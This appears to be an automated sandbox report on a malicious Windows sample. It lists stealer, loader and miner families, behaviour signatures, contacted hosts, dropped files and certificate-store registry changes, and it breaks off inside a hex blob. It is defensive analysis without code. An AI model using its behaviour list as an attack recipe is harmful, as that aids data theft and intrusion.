Analysis Overview
SHA256
c329c73a0c1f6f156cc7a662abdf5e7ea30ed8b8f4b35253bf7f2435b83445c8
Threat Level: Known bad
The file c71460537b9584b5f550df694b80c9aa_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
OnlyLogger
GCleaner
Vidar
Amadey family
Onlylogger family
Fabookie family
Fabookie
Amadey
Gcleaner family
Vidar family
Xmrig family
Detect Fabookie payload
xmrig
Vidar Stealer
XMRig Miner payload
OnlyLogger payload
Blocklisted process makes network request
Loads dropped DLL
Checks computer location settings
Executes dropped EXE
Reads user/profile data of web browsers
Looks up external IP address via web service
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Drops file in Windows directory
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Unsigned PE
Program crash
System Time Discovery
Checks SCSI registry key(s)
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Kills process with taskkill
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: GetForegroundWindowSpam
Modifies system certificate store
Uses Task Scheduler COM API
Scheduled Task/Job: Scheduled Task
Suspicious use of FindShellTrayWindow
Modifies data under HKEY_USERS
Modifies Internet Explorer settings
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-12-05 09:40
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-12-05 09:40
Reported
2024-12-05 09:42
Platform
win7-20241023-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Amadey
Amadey family
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
GCleaner
Gcleaner family
OnlyLogger
Onlylogger family
Vidar
Vidar family
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\INF\setupapi.ev3 | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.ev1 | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\f77c275.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\f77c275.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIC83E.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIC87D.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIC4C2.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIC7EE.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIC88E.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIC92B.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\f77c276.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIC80E.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\f77c276.ipi | C:\Windows\system32\msiexec.exe | N/A |
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\lijun-game.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-123MS.tmp\setup_2.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\f78b1f1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-H5OR1.tmp\setup_2.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\inst001.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\control.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\f7873aa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
System Time Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C\Blob = 030000000100000014000000d89e3bd43d5d909b47a18977aa9d5ce36cee184c1400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb040000000100000010000000285ec909c4ab0d2d57f5086b225799aa0f000000010000003000000013baa039635f1c5292a8c2f36aae7e1d25c025202e9092f5b0f53f5f752dfa9c71b3d1b8d9a6358fcee6ec75622fabf9190000000100000010000000ea6089055218053dd01e37e1d806eedf1800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa22000000001000000850500003082058130820469a00302010202103972443af922b751d7d36c10dd313595300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3139303331323030303030305a170d3238313233313233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c05000382010100188751dc74213d9c8ae027b733d02eccecf0e6cb5e11de226f9b758e9e72fee4d6feaa1f9c962def034a7eaef48d6f723c433bc03febb8df5caaa9c6aef2fcd8eea37b43f686367c14e0cdf4f73ffedeb8b48af09196fefd43647efdccd201a17d7df81919c9422b13bf588bbaa4a266047688914e0c8914cea24dc932b3bae8141abc71f15bf0410b98000a220310e50cb1f9cd923719ed3bf1e43ab6f945132675afbbaaef3f7b773bd2c402913d1900d3175c39db3f7b180d45cd9385962f5ddf59164f3f51bdd545183fed4a8ee80661742316b50d50732744477f105d892a6b853114c4e8a96a4c80bc6a78cfb87f8e7672990c9dfed7910816a1a35f95 | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff04